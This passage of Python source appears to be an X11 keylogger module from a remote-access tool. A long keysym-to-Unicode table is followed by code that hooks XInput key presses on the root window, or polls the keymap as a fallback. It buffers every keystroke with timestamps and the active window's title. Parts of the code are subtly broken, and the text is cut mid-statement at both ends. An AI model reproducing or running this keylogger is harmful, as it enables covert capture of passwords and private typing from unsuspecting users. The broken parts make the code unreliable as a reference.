u'\\u03c5', 0x07f6: u'\\u03c6', 0x07f7: u'\\u03c7', 0x07f8: u'\\u03c8', + 0x07f9: u'\\u03c9', 0x08a1: u'\\u23b7', 0x08a2: u'\\u250c', 0x08a3: u'\\u2500', 0x08a4: u'\\u2320', + 0x08a5: u'\\u2321', 0x08a6: u'\\u2502', 0x08a7: u'\\u23a1', 0x08a8: u'\\u23a3', 0x08a9: u'\\u23a4', + 
0x08aa: u'\\u23a6', 0x08ab: u'\\u239b', 0x08ac: u'\\u239d', 0x08ad: u'\\u239e', 0x08ae: u'\\u23a0', + 0x08af: u'\\u23a8', 0x08b0: u'\\u23ac', 0x08bc: u'\\u2264', 0x08bd: u'\\u2260', 0x08be: u'\\u2265', + 0x08bf: u'\\u222b', 0x08c0: u'\\u2234', 0x08c1: u'\\u221d', 0x08c2: u'\\u221e', 0x08c5: u'\\u2207', + 0x08c8: u'\\u223c', 0x08c9: u'\\u2243', 0x08cd: u'\\u21d4', 0x08ce: u'\\u21d2', 0x08cf: u'\\u2261', + 0x08d6: u'\\u221a', 0x08da: u'\\u2282', 0x08db: u'\\u2283', 0x08dc: u'\\u2229', 0x08dd: u'\\u222a', + 0x08de: u'\\u2227', 0x08df: u'\\u2228', 0x08ef: u'\\u2202', 0x08f6: u'\\u0192', 0x08fb: u'\\u2190', + 0x08fc: u'\\u2191', 0x08fd: u'\\u2192', 0x08fe: u'\\u2193', 0x09e0: u'\\u25c6', 0x09e1: u'\\u2592', + 0x09e2: u'\\u2409', 0x09e3: u'\\u240c', 0x09e4: u'\\u240d', 0x09e5: u'\\u240a', 0x09e8: u'\\u2424', + 0x09e9: u'\\u240b', 0x09ea: u'\\u2518', 0x09eb: u'\\u2510', 0x09ec: u'\\u250c', 0x09ed: u'\\u2514', + 0x09ee: u'\\u253c', 0x09ef: u'\\u23ba', 0x09f0: u'\\u23bb', 0x09f1: u'\\u2500', 0x09f2: u'\\u23bc', + 0x09f3: u'\\u23bd', 0x09f4: u'\\u251c', 0x09f5: u'\\u2524', 0x09f6: u'\\u2534', 0x09f7: u'\\u252c', + 0x09f8: u'\\u2502', 0x0aa1: u'\\u2003', 0x0aa2: u'\\u2002', 0x0aa3: u'\\u2004', 0x0aa4: u'\\u2005', + 0x0aa5: u'\\u2007', 0x0aa6: u'\\u2008', 0x0aa7: u'\\u2009', 0x0aa8: u'\\u200a', 0x0aa9: u'\\u2014', + 0x0aaa: u'\\u2013', 0x0aac: u'\\u2423', 0x0aae: u'\\u2026', 0x0aaf: u'\\u2025', 0x0ab0: u'\\u2153', + 0x0ab1: u'\\u2154', 0x0ab2: u'\\u2155', 0x0ab3: u'\\u2156', 0x0ab4: u'\\u2157', 0x0ab5: u'\\u2158', + 0x0ab6: u'\\u2159', 0x0ab7: u'\\u215a', 0x0ab8: u'\\u2105', 0x0abb: u'\\u2012', 0x0abc: u'\\u27e8', + 0x0abd: u'\\u002e', 0x0abe: u'\\u27e9', 0x0ac3: u'\\u215b', 0x0ac4: u'\\u215c', 0x0ac5: u'\\u215d', + 0x0ac6: u'\\u215e', 0x0ac9: u'\\u2122', 0x0aca: u'\\u2613', 0x0acc: u'\\u25c1', 0x0acd: u'\\u25b7', + 0x0ace: u'\\u25cb', 0x0acf: u'\\u25af', 0x0ad0: u'\\u2018', 0x0ad1: u'\\u2019', 0x0ad2: u'\\u201c', + 0x0ad3: u'\\u201d', 0x0ad4: u'\\u211e', 0x0ad6: u'\\u2032', 
0x0ad7: u'\\u2033', 0x0ad9: u'\\u271d', + 0x0adb: u'\\u25ac', 0x0adc: u'\\u25c0', 0x0add: u'\\u25b6', 0x0ade: u'\\u25cf', 0x0adf: u'\\u25ae', + 0x0ae0: u'\\u25e6', 0x0ae1: u'\\u25ab', 0x0ae2: u'\\u25ad', 0x0ae3: u'\\u25b3', 0x0ae4: u'\\u25bd', + 0x0ae5: u'\\u2606', 0x0ae6: u'\\u2022', 0x0ae7: u'\\u25aa', 0x0ae8: u'\\u25b2', 0x0ae9: u'\\u25bc', + 0x0aea: u'\\u261c', 0x0aeb: u'\\u261e', 0x0aec: u'\\u2663', 0x0aed: u'\\u2666', 0x0aee: u'\\u2665', + 0x0af0: u'\\u2720', 0x0af1: u'\\u2020', 0x0af2: u'\\u2021', 0x0af3: u'\\u2713', 0x0af4: u'\\u2717', + 0x0af5: u'\\u266f', 0x0af6: u'\\u266d', 0x0af7: u'\\u2642', 0x0af8: u'\\u2640', 0x0af9: u'\\u260e', + 0x0afa: u'\\u2315', 0x0afb: u'\\u2117', 0x0afc: u'\\u2038', 0x0afd: u'\\u201a', 0x0afe: u'\\u201e', + 0x0ba3: u'\\u003c', 0x0ba6: u'\\u003e', 0x0ba8: u'\\u2228', 0x0ba9: u'\\u2227', 0x0bc0: u'\\u00af', + 0x0bc2: u'\\u22a5', 0x0bc3: u'\\u2229', 0x0bc4: u'\\u230a', 0x0bc6: u'\\u005f', 0x0bca: u'\\u2218', + 0x0bcc: u'\\u2395', 0x0bce: u'\\u22a4', 0x0bcf: u'\\u25cb', 0x0bd3: u'\\u2308', 0x0bd6: u'\\u222a', + 0x0bd8: u'\\u2283', 0x0bda: u'\\u2282', 0x0bdc: u'\\u22a2', 0x0bfc: u'\\u22a3', 0x0cdf: u'\\u2017', + 0x0ce0: u'\\u05d0', 0x0ce1: u'\\u05d1', 0x0ce1: u'\\u05d1', 0x0ce2: u'\\u05d2', 0x0ce2: u'\\u05d2', + 0x0ce3: u'\\u05d3', 0x0ce3: u'\\u05d3', 0x0ce4: u'\\u05d4', 0x0ce5: u'\\u05d5', 0x0ce6: u'\\u05d6', + 0x0ce6: u'\\u05d6', 0x0ce7: u'\\u05d7', 0x0ce7: u'\\u05d7', 0x0ce8: u'\\u05d8', 0x0ce8: u'\\u05d8', + 0x0ce9: u'\\u05d9', 0x0cea: u'\\u05da', 0x0ceb: u'\\u05db', 0x0cec: u'\\u05dc', 0x0ced: u'\\u05dd', + 0x0cee: u'\\u05de', 0x0cef: u'\\u05df', 0x0cf0: u'\\u05e0', 0x0cf1: u'\\u05e1', 0x0cf1: u'\\u05e1', + 0x0cf2: u'\\u05e2', 0x0cf3: u'\\u05e3', 0x0cf4: u'\\u05e4', 0x0cf5: u'\\u05e5', 0x0cf5: u'\\u05e5', + 0x0cf6: u'\\u05e6', 0x0cf6: u'\\u05e6', 0x0cf7: u'\\u05e7', 0x0cf7: u'\\u05e7', 0x0cf8: u'\\u05e8', + 0x0cf9: u'\\u05e9', 0x0cfa: u'\\u05ea', 0x0cfa: u'\\u05ea', 0x0da1: u'\\u0e01', 0x0da2: u'\\u0e02', + 0x0da3: u'\\u0e03', 
0x0da4: u'\\u0e04', 0x0da5: u'\\u0e05', 0x0da6: u'\\u0e06', 0x0da7: u'\\u0e07', + 0x0da8: u'\\u0e08', 0x0da9: u'\\u0e09', 0x0daa: u'\\u0e0a', 0x0dab: u'\\u0e0b', 0x0dac: u'\\u0e0c', + 0x0dad: u'\\u0e0d', 0x0dae: u'\\u0e0e', 0x0daf: u'\\u0e0f', 0x0db0: u'\\u0e10', 0x0db1: u'\\u0e11', + 0x0db2: u'\\u0e12', 0x0db3: u'\\u0e13', 0x0db4: u'\\u0e14', 0x0db5: u'\\u0e15', 0x0db6: u'\\u0e16', + 0x0db7: u'\\u0e17', 0x0db8: u'\\u0e18', 0x0db9: u'\\u0e19', 0x0dba: u'\\u0e1a', 0x0dbb: u'\\u0e1b', + 0x0dbc: u'\\u0e1c', 0x0dbd: u'\\u0e1d', 0x0dbe: u'\\u0e1e', 0x0dbf: u'\\u0e1f', 0x0dc0: u'\\u0e20', + 0x0dc1: u'\\u0e21', 0x0dc2: u'\\u0e22', 0x0dc3: u'\\u0e23', 0x0dc4: u'\\u0e24', 0x0dc5: u'\\u0e25', + 0x0dc6: u'\\u0e26', 0x0dc7: u'\\u0e27', 0x0dc8: u'\\u0e28', 0x0dc9: u'\\u0e29', 0x0dca: u'\\u0e2a', + 0x0dcb: u'\\u0e2b', 0x0dcc: u'\\u0e2c', 0x0dcd: u'\\u0e2d', 0x0dce: u'\\u0e2e', 0x0dcf: u'\\u0e2f', + 0x0dd0: u'\\u0e30', 0x0dd1: u'\\u0e31', 0x0dd2: u'\\u0e32', 0x0dd3: u'\\u0e33', 0x0dd4: u'\\u0e34', + 0x0dd5: u'\\u0e35', 0x0dd6: u'\\u0e36', 0x0dd7: u'\\u0e37', 0x0dd8: u'\\u0e38', 0x0dd9: u'\\u0e39', + 0x0dda: u'\\u0e3a', 0x0ddf: u'\\u0e3f', 0x0de0: u'\\u0e40', 0x0de1: u'\\u0e41', 0x0de2: u'\\u0e42', + 0x0de3: u'\\u0e43', 0x0de4: u'\\u0e44', 0x0de5: u'\\u0e45', 0x0de6: u'\\u0e46', 0x0de7: u'\\u0e47', + 0x0de8: u'\\u0e48', 0x0de9: u'\\u0e49', 0x0dea: u'\\u0e4a', 0x0deb: u'\\u0e4b', 0x0dec: u'\\u0e4c', + 0x0ded: u'\\u0e4d', 0x0df0: u'\\u0e50', 0x0df1: u'\\u0e51', 0x0df2: u'\\u0e52', 0x0df3: u'\\u0e53', + 0x0df4: u'\\u0e54', 0x0df5: u'\\u0e55', 0x0df6: u'\\u0e56', 0x0df7: u'\\u0e57', 0x0df8: u'\\u0e58', + 0x0df9: u'\\u0e59', 0x0ea1: u'\\u3131', 0x0ea2: u'\\u3132', 0x0ea3: u'\\u3133', 0x0ea4: u'\\u3134', + 0x0ea5: u'\\u3135', 0x0ea6: u'\\u3136', 0x0ea7: u'\\u3137', 0x0ea8: u'\\u3138', 0x0ea9: u'\\u3139', + 0x0eaa: u'\\u313a', 0x0eab: u'\\u313b', 0x0eac: u'\\u313c', 0x0ead: u'\\u313d', 0x0eae: u'\\u313e', + 0x0eaf: u'\\u313f', 0x0eb0: u'\\u3140', 0x0eb1: u'\\u3141', 0x0eb2: u'\\u3142', 
0x0eb3: u'\\u3143', + 0x0eb4: u'\\u3144', 0x0eb5: u'\\u3145', 0x0eb6: u'\\u3146', 0x0eb7: u'\\u3147', 0x0eb8: u'\\u3148', + 0x0eb9: u'\\u3149', 0x0eba: u'\\u314a', 0x0ebb: u'\\u314b', 0x0ebc: u'\\u314c', 0x0ebd: u'\\u314d', + 0x0ebe: u'\\u314e', 0x0ebf: u'\\u314f', 0x0ec0: u'\\u3150', 0x0ec1: u'\\u3151', 0x0ec2: u'\\u3152', + 0x0ec3: u'\\u3153', 0x0ec4: u'\\u3154', 0x0ec5: u'\\u3155', 0x0ec6: u'\\u3156', 0x0ec7: u'\\u3157', + 0x0ec8: u'\\u3158', 0x0ec9: u'\\u3159', 0x0eca: u'\\u315a', 0x0ecb: u'\\u315b', 0x0ecc: u'\\u315c', + 0x0ecd: u'\\u315d', 0x0ece: u'\\u315e', 0x0ecf: u'\\u315f', 0x0ed0: u'\\u3160', 0x0ed1: u'\\u3161', + 0x0ed2: u'\\u3162', 0x0ed3: u'\\u3163', 0x0ed4: u'\\u11a8', 0x0ed5: u'\\u11a9', 0x0ed6: u'\\u11aa', + 0x0ed7: u'\\u11ab', 0x0ed8: u'\\u11ac', 0x0ed9: u'\\u11ad', 0x0eda: u'\\u11ae', 0x0edb: u'\\u11af', + 0x0edc: u'\\u11b0', 0x0edd: u'\\u11b1', 0x0ede: u'\\u11b2', 0x0edf: u'\\u11b3', 0x0ee0: u'\\u11b4', + 0x0ee1: u'\\u11b5', 0x0ee2: u'\\u11b6', 0x0ee3: u'\\u11b7', 0x0ee4: u'\\u11b8', 0x0ee5: u'\\u11b9', + 0x0ee6: u'\\u11ba', 0x0ee7: u'\\u11bb', 0x0ee8: u'\\u11bc', 0x0ee9: u'\\u11bd', 0x0eea: u'\\u11be', + 0x0eeb: u'\\u11bf', 0x0eec: u'\\u11c0', 0x0eed: u'\\u11c1', 0x0eee: u'\\u11c2', 0x0eef: u'\\u316d', + 0x0ef0: u'\\u3171', 0x0ef1: u'\\u3178', 0x0ef2: u'\\u317f', 0x0ef3: u'\\u3181', 0x0ef4: u'\\u3184', + 0x0ef5: u'\\u3186', 0x0ef6: u'\\u318d', 0x0ef7: u'\\u318e', 0x0ef8: u'\\u11eb', 0x0ef9: u'\\u11f0', + 0x0efa: u'\\u11f9', 0x0eff: u'\\u20a9', 0x13bc: u'\\u0152', 0x13bd: u'\\u0153', 0x13be: u'\\u0178', + 0x20a0: u'\\u20a0', 0x20a1: u'\\u20a1', 0x20a2: u'\\u20a2', 0x20a3: u'\\u20a3', 0x20a4: u'\\u20a4', + 0x20a5: u'\\u20a5', 0x20a6: u'\\u20a6', 0x20a7: u'\\u20a7', 0x20a8: u'\\u20a8', 0x20a9: u'\\u20a9', + 0x20aa: u'\\u20aa', 0x20ab: u'\\u20ab', 0x20ac: u'\\u20ac', 0xfe50: u'\\u0300', 0xfe51: u'\\u0301', + 0xfe52: u'\\u0302', 0xfe53: u'\\u0303', 0xfe54: u'\\u0304', 0xfe55: u'\\u0306', 0xfe56: u'\\u0307', + 0xfe57: u'\\u0308', 0xfe58: u'\\u030a', 
0xfe59: u'\\u030b', 0xfe5a: u'\\u030c', 0xfe5b: u'\\u0327', + 0xfe5c: u'\\u0328', 0xfe5d: u'\\u0345', 0xfe5e: u'\\u3099', 0xfe5f: u'\\u309a', 0xff08: u'\\u0008', + 0xff09: u'\\u0009', 0xff0a: u'\\u000a', 0xff0b: u'\\u000b', 0xff0d: u'\\u000d', 0xff13: u'\\u0013', + 0xff14: u'\\u0014', 0xff15: u'\\u0015', 0xff1b: u'\\u001b', 0xff80: u'\\u0020', 0xff89: u'\\u0009', + 0xff8d: u'\\u000d', 0xffaa: u'\\u002a', 0xffab: u'\\u002b', 0xffac: u'\\u002c', 0xffad: u'\\u002d', + 0xffae: u'\\u002e', 0xffaf: u'\\u002f', 0xffb0: u'\\u0030', 0xffb1: u'\\u0031', 0xffb2: u'\\u0032', + 0xffb3: u'\\u0033', 0xffb4: u'\\u0034', 0xffb5: u'\\u0035', 0xffb6: u'\\u0036', 0xffb7: u'\\u0037', + 0xffb8: u'\\u0038', 0xffb9: u'\\u0039', 0xffbd: u'\\u003d', 0x06ad: u'\\u0491', 0x06bd: u'\\u0490', + 0x14a2: u'\\u0587', 0x14a3: u'\\u0589', 0x14a4: u'\\u0029', 0x14a5: u'\\u0028', 0x14a6: u'\\u00bb', + 0x14a7: u'\\u00ab', 0x14a8: u'\\u2014', 0x14a9: u'\\u002e', 0x14aa: u'\\u055d', 0x14ab: u'\\u002c', + 0x14ac: u'\\u2013', 0x14ad: u'\\u058a', 0x14ae: u'\\u2026', 0x14af: u'\\u055c', 0x14b0: u'\\u055b', + 0x14b1: u'\\u055e', 0x14b2: u'\\u0531', 0x14b3: u'\\u0561', 0x14b4: u'\\u0532', 0x14b5: u'\\u0562', + 0x14b6: u'\\u0533', 0x14b7: u'\\u0563', 0x14b8: u'\\u0534', 0x14b9: u'\\u0564', 0x14ba: u'\\u0535', + 0x14bb: u'\\u0565', 0x14bc: u'\\u0536', 0x14bd: u'\\u0566', 0x14be: u'\\u0537', 0x14bf: u'\\u0567', + 0x14c0: u'\\u0538', 0x14c1: u'\\u0568', 0x14c2: u'\\u0539', 0x14c3: u'\\u0569', 0x14c4: u'\\u053a', + 0x14c5: u'\\u056a', 0x14c6: u'\\u053b', 0x14c7: u'\\u056b', 0x14c8: u'\\u053c', 0x14c9: u'\\u056c', + 0x14ca: u'\\u053d', 0x14cb: u'\\u056d', 0x14cc: u'\\u053e', 0x14cd: u'\\u056e', 0x14ce: u'\\u053f', + 0x14cf: u'\\u056f', 0x14d0: u'\\u0540', 0x14d1: u'\\u0570', 0x14d2: u'\\u0541', 0x14d3: u'\\u0571', + 0x14d4: u'\\u0542', 0x14d5: u'\\u0572', 0x14d6: u'\\u0543', 0x14d7: u'\\u0573', 0x14d8: u'\\u0544', + 0x14d9: u'\\u0574', 0x14da: u'\\u0545', 0x14db: u'\\u0575', 0x14dc: u'\\u0546', 0x14dd: u'\\u0576', + 
0x14de: u'\\u0547', 0x14df: u'\\u0577', 0x14e0: u'\\u0548', 0x14e1: u'\\u0578', 0x14e2: u'\\u0549', + 0x14e3: u'\\u0579', 0x14e4: u'\\u054a', 0x14e5: u'\\u057a', 0x14e6: u'\\u054b', 0x14e7: u'\\u057b', + 0x14e8: u'\\u054c', 0x14e9: u'\\u057c', 0x14ea: u'\\u054d', 0x14eb: u'\\u057d', 0x14ec: u'\\u054e', + 0x14ed: u'\\u057e', 0x14ee: u'\\u054f', 0x14ef: u'\\u057f', 0x14f0: u'\\u0550', 0x14f1: u'\\u0580', + 0x14f2: u'\\u0551', 0x14f3: u'\\u0581', 0x14f4: u'\\u0552', 0x14f5: u'\\u0582', 0x14f6: u'\\u0553', + 0x14f7: u'\\u0583', 0x14f8: u'\\u0554', 0x14f9: u'\\u0584', 0x14fa: u'\\u0555', 0x14fb: u'\\u0585', + 0x14fc: u'\\u0556', 0x14fd: u'\\u0586', 0x14fe: u'\\u055a', 0x14ff: u'\\u00a7', 0x15d0: u'\\u10d0', + 0x15d1: u'\\u10d1', 0x15d2: u'\\u10d2', 0x15d3: u'\\u10d3', 0x15d4: u'\\u10d4', 0x15d5: u'\\u10d5', + 0x15d6: u'\\u10d6', 0x15d7: u'\\u10d7', 0x15d8: u'\\u10d8', 0x15d9: u'\\u10d9', 0x15da: u'\\u10da', + 0x15db: u'\\u10db', 0x15dc: u'\\u10dc', 0x15dd: u'\\u10dd', 0x15de: u'\\u10de', 0x15df: u'\\u10df', + 0x15e0: u'\\u10e0', 0x15e1: u'\\u10e1', 0x15e2: u'\\u10e2', 0x15e3: u'\\u10e3', 0x15e4: u'\\u10e4', + 0x15e5: u'\\u10e5', 0x15e6: u'\\u10e6', 0x15e7: u'\\u10e7', 0x15e8: u'\\u10e8', 0x15e9: u'\\u10e9', + 0x15ea: u'\\u10ea', 0x15eb: u'\\u10eb', 0x15ec: u'\\u10ec', 0x15ed: u'\\u10ed', 0x15ee: u'\\u10ee', + 0x15ef: u'\\u10ef', 0x15f0: u'\\u10f0', 0x15f1: u'\\u10f1', 0x15f2: u'\\u10f2', 0x15f3: u'\\u10f3', + 0x15f4: u'\\u10f4', 0x15f5: u'\\u10f5', 0x15f6: u'\\u10f6', 0x12a1: u'\\u1e02', 0x12a2: u'\\u1e03', + 0x12a6: u'\\u1e0a', 0x12a8: u'\\u1e80', 0x12aa: u'\\u1e82', 0x12ab: u'\\u1e0b', 0x12ac: u'\\u1ef2', + 0x12b0: u'\\u1e1e', 0x12b1: u'\\u1e1f', 0x12b4: u'\\u1e40', 0x12b5: u'\\u1e41', 0x12b7: u'\\u1e56', + 0x12b8: u'\\u1e81', 0x12b9: u'\\u1e57', 0x12ba: u'\\u1e83', 0x12bb: u'\\u1e60', 0x12bc: u'\\u1ef3', + 0x12bd: u'\\u1e84', 0x12be: u'\\u1e85', 0x12bf: u'\\u1e61', 0x12d0: u'\\u0174', 0x12d7: u'\\u1e6a', + 0x12de: u'\\u0176', 0x12f0: u'\\u0175', 0x12f7: u'\\u1e6b', 
0x12fe: u'\\u0177', 0x0590: u'\\u06f0', + 0x0591: u'\\u06f1', 0x0592: u'\\u06f2', 0x0593: u'\\u06f3', 0x0594: u'\\u06f4', 0x0595: u'\\u06f5', + 0x0596: u'\\u06f6', 0x0597: u'\\u06f7', 0x0598: u'\\u06f8', 0x0599: u'\\u06f9', 0x05a5: u'\\u066a', + 0x05a6: u'\\u0670', 0x05a7: u'\\u0679', 0x05a8: u'\\u067e', 0x05a9: u'\\u0686', 0x05aa: u'\\u0688', + 0x05ab: u'\\u0691', 0x05ae: u'\\u06d4', 0x05b0: u'\\u0660', 0x05b1: u'\\u0661', 0x05b2: u'\\u0662', + 0x05b3: u'\\u0663', 0x05b4: u'\\u0664', 0x05b5: u'\\u0665', 0x05b6: u'\\u0666', 0x05b7: u'\\u0667', + 0x05b8: u'\\u0668', 0x05b9: u'\\u0669', 0x05f3: u'\\u0653', 0x05f4: u'\\u0654', 0x05f5: u'\\u0655', + 0x05f6: u'\\u0698', 0x05f7: u'\\u06a4', 0x05f8: u'\\u06a9', 0x05f9: u'\\u06af', 0x05fa: u'\\u06ba', + 0x05fb: u'\\u06be', 0x05fc: u'\\u06cc', 0x05fd: u'\\u06d2', 0x05fe: u'\\u06c1', 0x0680: u'\\u0492', + 0x0681: u'\\u0496', 0x0682: u'\\u049a', 0x0683: u'\\u049c', 0x0684: u'\\u04a2', 0x0685: u'\\u04ae', + 0x0686: u'\\u04b0', 0x0687: u'\\u04b2', 0x0688: u'\\u04b6', 0x0689: u'\\u04b8', 0x068a: u'\\u04ba', + 0x068c: u'\\u04d8', 0x068d: u'\\u04e2', 0x068e: u'\\u04e8', 0x068f: u'\\u04ee', 0x0690: u'\\u0493', + 0x0691: u'\\u0497', 0x0692: u'\\u049b', 0x0693: u'\\u049d', 0x0694: u'\\u04a3', 0x0695: u'\\u04af', + 0x0696: u'\\u04b1', 0x0697: u'\\u04b3', 0x0698: u'\\u04b7', 0x0699: u'\\u04b9', 0x069a: u'\\u04bb', + 0x069c: u'\\u04d9', 0x069d: u'\\u04e3', 0x069e: u'\\u04e9', 0x069f: u'\\u04ef', 0x16a3: u'\\u1e8a', + 0x16a6: u'\\u012c', 0x16a9: u'\\u01b5', 0x16aa: u'\\u01e6', 0x16af: u'\\u019f', 0x16b3: u'\\u1e8b', + 0x16b6: u'\\u012d', 0x16b9: u'\\u01b6', 0x16ba: u'\\u01e7', 0x16bd: u'\\u01d2', 0x16bf: u'\\u0275', + 0x16c6: u'\\u018f', 0x16f6: u'\\u0259', 0x16d1: u'\\u1e36', 0x16e1: u'\\u1e37', 0x1ea0: u'\\u1ea0', + 0x1ea1: u'\\u1ea1', 0x1ea2: u'\\u1ea2', 0x1ea3: u'\\u1ea3', 0x1ea4: u'\\u1ea4', 0x1ea5: u'\\u1ea5', + 0x1ea6: u'\\u1ea6', 0x1ea7: u'\\u1ea7', 0x1ea8: u'\\u1ea8', 0x1ea9: u'\\u1ea9', 0x1eaa: u'\\u1eaa', + 0x1eab: u'\\u1eab', 
0x1eac: u'\\u1eac', 0x1ead: u'\\u1ead', 0x1eae: u'\\u1eae', 0x1eaf: u'\\u1eaf', + 0x1eb0: u'\\u1eb0', 0x1eb1: u'\\u1eb1', 0x1eb2: u'\\u1eb2', 0x1eb3: u'\\u1eb3', 0x1eb4: u'\\u1eb4', + 0x1eb5: u'\\u1eb5', 0x1eb6: u'\\u1eb6', 0x1eb7: u'\\u1eb7', 0x1eb8: u'\\u1eb8', 0x1eb9: u'\\u1eb9', + 0x1eba: u'\\u1eba', 0x1ebb: u'\\u1ebb', 0x1ebc: u'\\u1ebc', 0x1ebd: u'\\u1ebd', 0x1ebe: u'\\u1ebe', + 0x1ebf: u'\\u1ebf', 0x1ec0: u'\\u1ec0', 0x1ec1: u'\\u1ec1', 0x1ec2: u'\\u1ec2', 0x1ec3: u'\\u1ec3', + 0x1ec4: u'\\u1ec4', 0x1ec5: u'\\u1ec5', 0x1ec6: u'\\u1ec6', 0x1ec7: u'\\u1ec7', 0x1ec8: u'\\u1ec8', + 0x1ec9: u'\\u1ec9', 0x1eca: u'\\u1eca', 0x1ecb: u'\\u1ecb', 0x1ecc: u'\\u1ecc', 0x1ecd: u'\\u1ecd', + 0x1ece: u'\\u1ece', 0x1ecf: u'\\u1ecf', 0x1ed0: u'\\u1ed0', 0x1ed1: u'\\u1ed1', 0x1ed2: u'\\u1ed2', + 0x1ed3: u'\\u1ed3', 0x1ed4: u'\\u1ed4', 0x1ed5: u'\\u1ed5', 0x1ed6: u'\\u1ed6', 0x1ed7: u'\\u1ed7', + 0x1ed8: u'\\u1ed8', 0x1ed9: u'\\u1ed9', 0x1eda: u'\\u1eda', 0x1edb: u'\\u1edb', 0x1edc: u'\\u1edc', + 0x1edd: u'\\u1edd', 0x1ede: u'\\u1ede', 0x1edf: u'\\u1edf', 0x1ee0: u'\\u1ee0', 0x1ee1: u'\\u1ee1', + 0x1ee2: u'\\u1ee2', 0x1ee3: u'\\u1ee3', 0x1ee4: u'\\u1ee4', 0x1ee5: u'\\u1ee5', 0x1ee6: u'\\u1ee6', + 0x1ee7: u'\\u1ee7', 0x1ee8: u'\\u1ee8', 0x1ee9: u'\\u1ee9', 0x1eea: u'\\u1eea', 0x1eeb: u'\\u1eeb', + 0x1eec: u'\\u1eec', 0x1eed: u'\\u1eed', 0x1eee: u'\\u1eee', 0x1eef: u'\\u1eef', 0x1ef0: u'\\u1ef0', + 0x1ef1: u'\\u1ef1', 0x1ef4: u'\\u1ef4', 0x1ef5: u'\\u1ef5', 0x1ef6: u'\\u1ef6', 0x1ef7: u'\\u1ef7', + 0x1ef8: u'\\u1ef8', 0x1ef9: u'\\u1ef9', 0x1efa: u'\\u01a0', 0x1efb: u'\\u01a1', 0x1efc: u'\\u01af', + 0x1efd: u'\\u01b0', 0x1e9f: u'\\u0303', 0x1ef2: u'\\u0300', 0x1ef3: u'\\u0301', 0x1efe: u'\\u0309', + 0x1eff: u'\\u0323', 0xfe60: u'\\u0323', 0xfe61: u'\\u0309', 0xfe62: u'\\u031b', + }.get(ks) + +class NotAvailable(Exception): + pass + +job_message_buffer(str(x11)+' '+str(xi)+'\\n') + +daemon = False +stopped = False +last_clipboard = "" +state = set() +group = 0 +level = 0 +display 
= None +x11 = x11 +xi = xi + +XkbEventCode = ct.c_int(0) +XkbErrorReturn = ct.c_int(0) +XkbMajorVersion = ct.c_int(1) +XkbMinorVersion = ct.c_int(0) +XkbReasonReturn = ct.c_int(0) + +if x11: + display = x11.XkbOpenDisplay( + None, + ct.pointer(XkbEventCode), ct.pointer(XkbErrorReturn), + ct.pointer(XkbMajorVersion), ct.pointer(XkbMinorVersion), + ct.pointer(XkbReasonReturn) + ) + +def get_active_window(): + window = ct.c_ulong() + dw = ct.c_int() + + if not ( x11.XGetInputFocus( + display, ct.pointer(window), ct.pointer(dw) + ) and window ): + return + + return window + +def get_window_title(window): + if not window: + return + + hint = ClassHint() + if x11.XGetClassHint(display, window, ct.pointer(hint)): + return hint.name + +def get_window_name(window): + prop = XTextProperty() + x11.XGetWMName(display, window, ct.pointer(prop)) + state = ct.c_char_p("WM_STATE") + onlyifexist = ct.c_bool(False) + atom = x11.XInternAtom(display, state, False) + refs = (ct.byref(ct.c_ulong()), ct.byref(ct.c_int()), ct.byref(ct.c_ulong())) + buf_len = ct.c_ulong() + buf = ct.c_char_p() + x11.XGetWindowProperty(display, window, atom, 0, 0, False, + 0, refs[0], refs[1], refs[2], + ct.byref(buf_len), ct.byref(buf)) + if buf.value is None: + root_return, parent_return, children_return, nchildren_return = (ct.byref(ct.c_ulong()), ct.pointer(ct.c_ulong()), ct.pointer(ct.c_ulong()), ct.c_uint()) + x11.XQueryTree(display, window, root_return, parent_return, children_return, ct.pointer(nchildren_return)) + x11.XGetWMName(display, parent_return.contents, ct.pointer(prop)) + return prop.value + + +def get_active_window_title(): + return get_window_title(get_active_window()) + +def append_key_buff(k): + if k: + window = get_active_window() + if str(append_key_buff.last_window) != str(window): + job_message_buffer("\\n%s: %s\\n"%(strftime("%d-%m-%Y %H:%M:%S"), \ + get_window_name(window))) + append_key_buff.last_window = window + job_message_buffer(k) + +append_key_buff.last_window = None + 
+def poll(callback, sleep_interval=.01): + while not stopped: + sleep(sleep_interval) + released, group, level = fetch_keys_poll() + callback(to_keysyms(released, group, level)) + +def xinput(callback): + if not xi: + raise NotAvailable() + + xi_opcode = ct.c_int() + xi_event = ct.c_int() + xi_error = ct.c_int() + + if not x11.XQueryExtension( + display, + 'XInputExtension', + ct.pointer(xi_opcode), ct.pointer(xi_event), ct.pointer(xi_error) + ): + return NotAvailable() + + root_win = x11.XDefaultRootWindow(display) + job_message_buffer(str(root_win)) + eventmask = XiEventMask() + eventmask.deviceid = 0 + eventmask.mask_len = XiMaxLen() + + mask = (ct.c_byte*eventmask.mask_len)() + XiSetMask(mask, 2) # KeyPress + eventmask.mask = ct.cast(ct.pointer(mask), ct.c_void_p) + xi.XISelectEvents(display, root_win, ct.cast(ct.pointer(eventmask), ct.c_void_p), 1) + x11.XMapWindow(display, root_win) + x11.XSync(display, 0) + while not stopped: + event = XEvent() + x11.XNextEvent(display, ct.pointer(event)) + x11.XGetEventData(display, ct.pointer(event.cookie)) + if event.cookie.type == 35 and event.cookie.extension == xi_opcode.value: + xievent = ct.cast(event.cookie.data, ct.POINTER(XIDeviceEvent)).contents + callback(to_keysyms( + [xievent.detail], + xievent.group.effective, + xievent.mods.effective + )) + + x11.XFreeEventData(display, ct.pointer(event.cookie)) + + x11.XDestroyWindow(display, root_win) + +def run(): + try: + xinput(append_key_buff) + except NotAvailable: + job_message_buffer("poll") + poll(append_key_buff) + except: + import traceback + job_message_buffer("Exception\\n"+traceback.format_exc()) + +def stop(): + stopped = True + +def dump(): + res = u''.join(buffer) + buffer = [] + return res + +def fetch_keys_poll(): + state = XkbState() + x11.XkbGetState(display, 0x0100, ct.pointer(state)) + + group = ord(state.group) + level = ord(state.locked_mods) & 1 + + keyboard = ct.c_buffer(32) + x11.XQueryKeymap(display, keyboard) + current = set() + + for byte, 
value in enumerate(keyboard): + value = ord(value) + if not value: + continue + + for bit in xrange(8): + if value & (1 << bit): + current.add(byte*8 + bit) + + released = set(x for x in state if not x in current and x) + + state = current + group, group = group, group + level, level = level, level + + return released, group, level + +def to_keysyms(released, group, level): + keys = set() + + for k in set(released): + # We incorrectly guess level here, but in 99% real life cases shift means level1 + # Also some things may not be available in group, so fallback to default one + ks = x11.XkbKeycodeToKeysym(display, k, group, level) + if not ks: + ks = x11.XkbKeycodeToKeysym(display, k, 0, level) + if not ks: + ks = x11.XkbKeycodeToKeysym(display, k, 